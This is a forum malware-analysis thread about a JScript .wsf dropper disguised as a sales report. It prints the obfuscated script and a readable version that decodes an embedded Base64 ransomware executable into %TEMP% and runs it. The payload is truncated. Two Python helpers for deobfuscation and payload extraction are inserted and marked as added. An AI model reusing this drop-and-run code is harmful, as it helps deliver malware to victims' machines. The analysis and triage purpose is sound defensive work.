Malware Analysis 'sales report 5170.wsf' sample - dropper - very basic obfuscation method

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
http://malwaretips.com/threads/22-7-16-6-samples.61625/

sales report 5170.wsf
12/55
https://www.virustotal.com/en/file/...c38a4a74e12136a9ed7bd8a16156626865e/analysis/

Exe file dropped:
syf4J4dMPJO14jlw.exe
10/54
https://www.virustotal.com/en/file/c3b420406e887b6e41425ef5bdb2214a9da95ff9d8fc1395faaee131e7bf7a4e/analysis/

I have chosen this sample because:
- I think that it is the worst obfuscation method I have seen these last months :eek:
- it's a dropper, but the exe data (ransomware) isn't very obfuscated in sales report 5170.wsf

Just compare with my previous analysis (an obfuscated JS downloading a VERY obfuscated ransomware and modifying it to create a runnable exe)
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/

Script used: JScript

Main part:

try {
    from_var_to_bin_File(v_bin_64Encoded, bin_Path);
    from_bin_File_to_exe_File(bin_Path, exe_Path);
    Shell.Run(exe_Path + " 321");
}
catch (e) {};


(1) The ransomware is hard-coded in the wsf file, in a var as a Base64 encoded String:

var v_bin_64Encoded = "TVqQAAMAAAAEAAAA//8AAAAAAA................................=";

I show only a small part for security purposes (and because there are a lot of chars :p)

(2) Paths are constructed:

var Shell = WScript.CreateObject("WScript.Shell");

var Path = Shell.ExpandEnvironmentStrings("%TEMP%/");
// "C:\Users\DardiM\AppData\Local\Temp/"

var exe_Path = Path + "syf4J4dMPJO14jlw.exe";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"

var bin_Path = exe_Path + ".bin";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin"

(3) One function is used to copy this string to a file with a .bin extension:

function from_var_to_bin_File(v_bin_64Encoded, bin_Path)
{
    var object_FileSystem = new ActiveXObject("Scripting.FileSystemObject");

    var file = object_FileSystem.OpenTextFile(bin_Path, 2, true);
    // 2: ForWriting (open the file for writing)
    // true: create the file if it doesn't exist

    file.Write(v_bin_64Encoded);
    file.Close();
    // here "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin" is created

    file = object_FileSystem.OpenTextFile(bin_Path, 1);
    // 1: ForReading (open the file for reading only)

    return file.ReadLine(); // return value never used
}

(4) Another function is used to read the .bin file, decode the content and write it to an exe file:

function from_bin_File_to_exe_File(bin_Path, exe_Path) {

    var object_FileSystem = WScript.CreateObject("Scripting.FileSystemObject");
    // Provides access to the computer's file system

    var Object_File = object_FileSystem.GetFile(bin_Path);
    // Returns a File object corresponding to the file at the specified path

    var file_TextStream = Object_File.OpenAsTextStream(1, 0);
    // 1: ForReading, 0: TristateFalse (ASCII) -> TextStream linked to the opened file

    var xmlDoc = WScript.CreateObject("MSXml2.DOMDocument");
    // xml document (never loaded from a file; only used for its Base64 decoder)

    var objNode = xmlDoc.CreateElement("Base64Data");
    // Element

    objNode.dataType = "bin.base64";
    // Element datatype: tells MSXML to decode .text as Base64

    objNode.text = file_TextStream.ReadAll();
    // Base64 encoded String

    var object_ADODBStream = WScript.CreateObject("ADODB.Stream");
    object_ADODBStream.Type = 1; // 1: adTypeBinary
    object_ADODBStream.Open();

    object_ADODBStream.Write(objNode.nodeTypedValue);
    // nodeTypedValue is the Base64 decoded content, written to the Stream as binary!

    object_ADODBStream.SaveToFile(exe_Path, 2);
    // 2: adSaveCreateOverWrite -> exe file created with real content
    // "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"

    file_TextStream.Close();
    object_ADODBStream.Close();
}

(5) Then the exe file is run:

Shell.Run(exe_Path + " 321");

=> it needs a parameter (like in my previous post)

(6) Conclusion:

- Very easy to deobfuscate this sample; the creator was certainly too tired to obfuscate it better :rolleyes:
- The Base64 decoder method is interesting (using a node of a temporary xml object in memory)
- It is also very easy to obtain the exe file quickly (copy and paste the Base64 encoded string into a tool (Notepad++), Base64 decode it, save the result to a file with a .exe extension ...) to send it to VirusTotal, for example, but as it needs a parameter, we won't obtain a realistic dynamic analysis this way :p
https://www.hybrid-analysis.com/sam...f9d8fc1395faaee131e7bf7a4e?environmentId=100/

=> it's better to submit the .wsf file :)

<job>
<script language="Jscript">
function GTd(Km1){return Km1;};var EPm8 = "1" + "";
var KPz = " 32" + "";
function Uz(JLc){return JLc;};var Ot1 = "Run" + "";
var Bn = "in" + "";
var EUk = ".b" + "";
var UXg = "xe" + "";
var MCt = ".e" + "";
function SXa(DFf){return DFf;};var Ab6 = "jlw" + "";
var VCt = "O14" + "";
var Bx = "PJ" + "";
var KRn4 = "4dM" + "";
var ZZo4 = "4J" + "";
var NAe = "syf" + "";
var KOx = "%/" + "";
var Pc1 = "EMP" + "";
var DUw = "%T" + "";
var Hx = "hell" + "";
var SDs = "pt.S" + "";
var Vm = "cri" + "";
var Ry = "WS" + "";
var HKt = "bject" + "";
var Vw9 = "teO" + "";
var JVg = "Crea" + "";
function Mp0(WNv1){return WNv1;};var Dn6 = "ine" + "";
var QZs3 = "adL" + "";
var VNa = "Re" + "";
var BPv = "ile" + "";
var WXa5 = "tF" + "";
var Uh = "nTex" + "";
var XUq = "Ope" + "";
var Ed5 = "Close" + "";
var LQw1 = "te" + "";
var Ln9 = "Wri" + "";
function EUk4(Xr4){return Xr4;};
function Ow(WWs){return WWs;};
function JOl(NVs4){return NVs4;};
function OPo(Oe8){return Oe8;};
var ABj = "le" + "";
var UXt = "Fi" + "";
var KPt5 = "Text" + "";
var IBm = "en" + "";
var Ci0 = "Op" + "";
var Xq8 = "t" + "";
var Mf7 = "Objec" + "";
var Ro = "tem" + "";
var Li = "ys" + "";
var DVr7 = "FileS" + "";
var PTw4 = "ng." + "";
var Hc = "ripti" + "";
var Aa0 = "Sc" + "";
var Ce0 = "se" + "";
var NBi2 = "Clo" + "";
function Be6(KAc){return KAc;};var Wi7 = "e" + "";
var Ae1 = "os" + "";
var Cs = "Cl" + "";
var Rp = "File" + "";
var DPx = "veTo" + "";
var My = "Sa" + "";
var RTe4 = "lue" + "";
var XYu0 = "pedVa" + "";
var Lw = "Ty" + "";
var Kv0 = "de" + "";
var ELo7 = "no" + "";
function Oq7(Mq){return Mq;};var REp = "ite" + "";
var Rk = "Wr" + "";
var MDl = "n" + "";
var Az6 = "Ope" + "";
var Sk = "Type" + "";
function OXr9(LHs){return LHs;};var Lr = "am" + "";
var HFx = ".Stre" + "";
var Rw0 = "ODB" + "";
var Ep = "AD" + "";
var Gf4 = "ct" + "";
var Xx4 = "je" + "";
var JZm = "eOb" + "";
var Bd0 = "eat" + "";
var IZg7 = "Cr" + "";
var Kv = "ll" + "";
var QSa = "ReadA" + "";
var Vk1 = "text" + "";
var QVk1 = "4" + "";
var FZn = "ase6" + "";
var Yc = "n.b" + "";
var Jx3 = "bi" + "";
function Pe(No5){return No5;};var PXd1 = "e" + "";
var Kz0 = "yp" + "";
var Tw = "aT" + "";
var DSw0 = "dat" + "";
var Sb1 = "a" + "";
var Fj7 = "64Dat" + "";
var YZc7 = "Base" + "";
var Yb9 = "ement" + "";
var Vc1 = "ateEl" + "";
var WLg = "cre" + "";
function Ta(Cl7){return Cl7;};var BBg = "nt" + "";
var Tb7 = "ume" + "";
var KIv7 = "Doc" + "";
var NMj = "OM" + "";
var ISc = "ml2.D" + "";
var Rz6 = "MSX" + "";
var Aa = "ject" + "";
var WWa9 = "Ob" + "";
var KMn = "eate" + "";
var Fp9 = "Cr" + "";
var PJc = "m" + "";
var Us4 = "Strea" + "";
var Qq = "ext" + "";
var AWo = "AsT" + "";
var Sv = "Open" + "";
var CSq = "e" + "";
var FSp8 = "Fil" + "";
var NTy = "Get" + "";
function Zr8(Kc1){return Kc1;};function PXq(Hk){return Hk;};var EYw = "ct" + "";
var Sk9 = "je" + "";
var VSa3 = "Ob" + "";
var Yb = "ystem" + "";
var Uw = "FileS" + "";
var TTn = "ting." + "";
var Sg = "ip" + "";
var Il = "Scr" + "";
function Yf(Pa8){return Pa8;};var Sh = "ect" + "";
var TSg = "teObj" + "";
var HXt5 = "Crea" + "";

var v_bin = "TVqQAAMAAAAEAAAA//8AAAAAAA....=";

// exe file content hidden in a Base64 Encoded string

var Tv0 = 1
var Aw = 0
var UMt = (1 * 2)
var IXf3 = 1

function EOk(HKp0, Bs) {

var Mp = WScript[HXt5 + (function Wg2(){return TSg;}()) + Yf(Sh)](Il + Sg + TTn + Zr8(Uw) + Yb + VSa3 + Sk9 + (function Rv(){return EYw;}()));
var Tr = Mp[NTy + FSp8 + CSq](HKp0);
var Wr /* G */ = Tr[Sv + AWo + Qq + Us4 + PJc](Tv0, Aw);

var QWa = WScript[HXt5 + TSg + Sh](Rz6 + ISc + Ta(NMj) + KIv7 + Tb7 + (function IAg0(){return BBg;}()));
var Ll8 = QWa[WLg + Vc1 + Yb9](YZc7 + Fj7 + Sb1);
Ll8[Pe(DSw0) + (function VUj(){return Tw;}()) + Kz0 + PXd1] = "bin.base64";

Ll8[Vk1] = Wr[QSa + Kv]();

var Xv1 = WScript[HXt5 + TSg + Sh]((function STl8(){return Ep;}()) + Rw0 + OXr9(HFx) + Lr);
Xv1[Sk] = IXf3;
Xv1[Az6 + MDl]();

Xv1[Rk + REp](Ll8[ELo7 + Kv0 + Lw + (function AFx9(){return XYu0;}()) + RTe4]);
Xv1[My + DPx + Rp](Bs, UMt);

Wr[Cs + Ae1 + Wi7]();
Xv1[(function Qw0(){return Cs;}()) + Ae1 + (function AIy(){return Wi7;}())]();
}


function TYs(CWy, Bs)
{

var EPy4, GXy, Zg
var YZl = 1, XQs = 2;
EPy4 = new ActiveXObject(Il + Sg + TTn + (function Wn3(){return Uw;}()) + Yb + PXq(VSa3) + Sk9 + EYw)
GXy = EPy4[EUk4(Ci0) + IBm + KPt5 + UXt + ABj](Bs, XQs, true)
GXy[Rk + Oq7(REp)](CWy);
GXy[Cs + Be6(Ae1) + Wi7]();
GXy = EPy4[Ow(Ci0) + JOl(IBm) + KPt5 + OPo(UXt) + ABj](Bs, YZl);
Zg = GXy[VNa + Mp0(QZs3) + Dn6]();
return(Zg);
}

var KWx=WScript[HXt5 + TSg + Sh](Ry + Vm + SDs + Hx);
var Zp=KWx.ExpandEnvironmentStrings(DUw + (function Bm(){return Pc1;}()) + KOx);
var OOq=Zp + NAe + (function Zb(){return ZZo4;}()) + KRn4 + Bx + SXa(VCt) + Ab6;
var JOv7=OOq + MCt + UXg;
var v_binpath=JOv7+EUk+Bn;

try {

TYs(v_bin, v_binpath);
EOk(v_binpath, JOv7);
KWx[Uz(Ot1)](JOv7 + GTd(KPz) + EPm8);
}
catch (e) {};

</script>
</job>
<job>
<script language="Jscript">

var v_bin_64Encoded = "TVqQAAMAAAAEAAAA//8AAAAAAA....=";

// ransomware Base64 encoded (I cut a big part)

var Shell = WScript.CreateObject("WScript.Shell");
var Path = Shell.ExpandEnvironmentStrings("%TEMP%/");
// "C:\Users\DardiM\AppData\Local\Temp/"

var exe_Path = Path + "syf4J4dMPJO14jlw.exe";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"

var bin_Path = exe_Path + ".bin";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin"

try {
    from_var_to_bin_File(v_bin_64Encoded, bin_Path);
    from_bin_File_to_exe_File(bin_Path, exe_Path);
    Shell.Run(exe_Path + " 321");
}
catch (e) {};

function from_bin_File_to_exe_File(bin_Path, exe_Path) {
    var object_FileSystem = WScript.CreateObject("Scripting.FileSystemObject");
    // Provides access to the computer's file system

    var Object_File = object_FileSystem.GetFile(bin_Path);
    // Returns a File object corresponding to the file at the specified path

    var file_TextStream = Object_File.OpenAsTextStream(1, 0);
    // 1: ForReading, 0: TristateFalse (ASCII) -> TextStream linked to the opened file

    var xmlDoc = WScript.CreateObject("MSXml2.DOMDocument");
    // xml document

    var objNode = xmlDoc.CreateElement("Base64Data");
    // Element

    objNode.dataType = "bin.base64";

    objNode.text = file_TextStream.ReadAll();
    // all the Base64 encoded String

    var object_ADODBStream = WScript.CreateObject("ADODB.Stream");
    object_ADODBStream.Type = 1; // 1: adTypeBinary
    object_ADODBStream.Open();

    object_ADODBStream.Write(objNode.nodeTypedValue);
    // Write the Base64 decoded data to the Stream
    object_ADODBStream.SaveToFile(exe_Path, 2);
    // 2: adSaveCreateOverWrite -> save the exe file with the decoded content

    file_TextStream.Close();
    object_ADODBStream.Close();
}



function from_var_to_bin_File(v_bin_64Encoded, bin_Path)
{
    var object_FileSystem = new ActiveXObject("Scripting.FileSystemObject");
    var file = object_FileSystem.OpenTextFile(bin_Path, 2, true);
    // 2: ForWriting (open the file for writing)
    // true: create the file if it doesn't exist

    file.Write(v_bin_64Encoded);
    file.Close();

    file = object_FileSystem.OpenTextFile(bin_Path, 1);
    // 1: ForReading (open the file for reading only)

    return file.ReadLine();
}

</script>
</job>
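The sample's obfuscation above comes down to three tricks: every string is split into `var X = "frag" + "";` pieces, some pieces are passed through identity functions (`Uz(Ot1)`) or wrapped as `(function Wg2(){return TSg;}())`, and methods are called through `obj[A + B + C]`. As an added example (not code from the original post), here is a Python deobfuscator for exactly that pattern, run on a few lines copied from the sample above; the regexes and the name `deobfuscate` are my own.

```python
import re

# A few lines copied from the obfuscated sample above: fragment vars,
# identity functions and IIFE wrappers are its three tricks.
SAMPLE = r'''
function GTd(Km1){return Km1;};var EPm8 = "1" + "";
var KPz = " 32" + "";
function Uz(JLc){return JLc;};var Ot1 = "Run" + "";
var KOx = "%/" + "";
var Pc1 = "EMP" + "";
var DUw = "%T" + "";
var Hx = "hell" + "";
var SDs = "pt.S" + "";
var Vm = "cri" + "";
var Ry = "WS" + "";
var Sh = "ect" + "";
var TSg = "teObj" + "";
var HXt5 = "Crea" + "";
var KWx=WScript[HXt5 + TSg + Sh](Ry + Vm + SDs + Hx);
var Zp=KWx.ExpandEnvironmentStrings(DUw + (function Bm(){return Pc1;}()) + KOx);
KWx[Uz(Ot1)](JOv7 + GTd(KPz) + EPm8);
'''

FRAG_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*\+\s*"";')          # var X = "str" + "";
IDENT_RE = re.compile(r'function\s+(\w+)\((\w+)\)\s*\{\s*return\s+\2;\s*\};?')  # function F(a){return a;}
IIFE_RE = re.compile(r'\(function\s+\w+\(\)\s*\{\s*return\s+(\w+);\s*\}\(\)\)')   # (function X(){return V;}())
CAT_RE = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')                          # "a" + "b"

def deobfuscate(src):
    frags = dict(FRAG_RE.findall(src))                    # name -> fragment
    idents = [m.group(1) for m in IDENT_RE.finditer(src)] # identity function names
    body = IDENT_RE.sub('', FRAG_RE.sub('', src))         # drop the definitions
    body = IIFE_RE.sub(r'\1', body)                       # (function X(){return V;}()) -> V
    if idents:
        body = re.sub(r'\b(?:%s)\((\w+)\)' % '|'.join(map(re.escape, idents)), r'\1', body)  # F(V) -> V
    if frags:  # one pass, so inserted literals are never re-matched as names
        body = re.sub(r'\b(?:%s)\b' % '|'.join(map(re.escape, frags)),
                      lambda m: '"%s"' % frags[m.group(0)], body)
    while True:                                           # fold "a" + "b" -> "ab" to a fixed point
        folded = CAT_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), body)
        if folded == body:
            break
        body = folded
    body = re.sub(r'\["([A-Za-z_]\w*)"\]', r'.\1', body)  # obj["Run"] -> obj.Run
    return '\n'.join(l for l in body.splitlines() if l.strip())

if __name__ == '__main__':
    print(deobfuscate(SAMPLE))
```

Run against the full script, the same three substitutions turn the whole sample into the readable version posted above.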
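The conclusion's manual triage (copy the Base64 string out, decode it, save it, submit it) as an added Python helper, not code from the original post: it pulls each long Base64 string assigned to a var out of a .wsf, decodes it, checks for the MZ header and returns a SHA-256 to look up on VirusTotal, and only ever writes the result with a .bin extension. The .wsf text and payload here are constructed stand-ins, and `extract_payloads` / `save_for_analysis` are my own names.

```python
import base64
import binascii
import hashlib
import re

# Constructed stand-in for the dropper: a fake payload that begins with the PE
# "MZ" magic, Base64-encoded into a var the way the sample embeds its exe.
FAKE_PE = b"MZ\x90\x00\x03\x00\x00\x00" + b"constructed, not a real binary. " * 4
WSF_TEXT = ('<job>\n<script language="Jscript">\n'
            'var v_bin = "%s";\n'
            'var KPz = " 32" + "";\n'
            '</script>\n</job>' % base64.b64encode(FAKE_PE).decode("ascii"))

# A var holding one long quoted Base64 run (the sample's is many KB long);
# short fragment strings like " 32" fall under the 64-char floor and are ignored.
B64_VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"([A-Za-z0-9+/=]{64,})"')

def extract_payloads(wsf_text):
    """Decode each embedded Base64 var; return dicts with hash, size and MZ check."""
    found = []
    for name, blob in B64_VAR_RE.findall(wsf_text):
        try:
            data = base64.b64decode(blob, validate=True)
        except binascii.Error:
            continue  # not clean Base64 (e.g. a truncated "...." paste): skip it
        found.append({
            "var": name,
            "sha256": hashlib.sha256(data).hexdigest(),  # look this up on VT before anything else
            "size": len(data),
            "is_pe": data[:2] == b"MZ",  # DOS/PE header => a dropped executable
            "data": data,
        })
    return found

def save_for_analysis(payload, out_dir):
    """Write the blob as <sha256>.bin (never .exe) so it cannot be run by a stray double-click."""
    path = "%s/%s.bin" % (out_dir, payload["sha256"])
    with open(path, "wb") as fh:
        fh.write(payload["data"])
    return path
```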
 

DardiM

With Shadow Defender enabled, I tried to test sales report 5170.wsf:
It creates the exe file and runs it
=> syf4J4dMPJO14jlw.exe does a few tasks (mainly loading DLLs and looking for some registry values and files) and exits without doing its real work
 

Der.Reisende

Level 45
Honorary Member
Top Poster
Content Creator
Malware Hunter
Dec 27, 2014
3,423
Great job, thank you for sharing @DardiM :) How many hours did that cost you? :p
It's interesting that it seems to be aware of SD as if it were a VM, judging from your second post :)
 

DardiM

Der.Reisende said:
Great job, thank you for sharing @DardiM :) How many hours did that cost you? :p
It's interesting that it seems to be aware of SD as if it were a VM, judging from your second post :)
Thanks for your great words :)

It cost more time to make a readable post than to analyse this sample :oops:

With or without the needed parameter ("321"), the ransomware did almost the same tasks. As I ran it on SD, I thought the same as you said.
The best way to be sure is to clone a system and make a real test on it, which I can't currently do because I have no other drive available :(
 
